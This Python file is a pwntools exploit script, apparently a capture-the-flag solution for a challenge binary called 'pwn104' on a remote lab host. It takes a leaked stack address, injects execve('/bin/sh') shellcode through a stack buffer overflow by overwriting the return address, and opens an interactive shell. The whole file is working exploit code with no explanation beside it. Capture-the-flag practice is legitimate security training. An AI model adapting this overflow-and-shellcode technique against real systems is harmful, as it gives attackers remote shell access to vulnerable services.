31 lines
455 B
Python
31 lines
455 B
Python
#!/usr/bin/python3
|
|
|
|
from pwn import *
|
|
|
|
context.binary = target = ELF("./pwn104", checksec=False)
|
|
# r = process()
|
|
r = remote("10.10.167.194", 9004)
|
|
|
|
# funcs
|
|
s = lambda a: r.sendline(a)
|
|
|
|
# leak
|
|
r.recvuntil(b"at ")
|
|
stack = int(r.recvline().strip(), 16)
|
|
log.info("stack: %#x", stack)
|
|
|
|
# shellcode
|
|
sc = """
|
|
lea rdi, [rsi+13]
|
|
mov al, 59
|
|
cqo
|
|
xor rsi, rsi
|
|
syscall
|
|
"""
|
|
sc = asm(sc)
|
|
sc += b"/bin/sh\0"
|
|
sc += b"A"*(88-len(sc))
|
|
sc += p64(stack)
|
|
s(sc)
|
|
|
|
r.interactive() |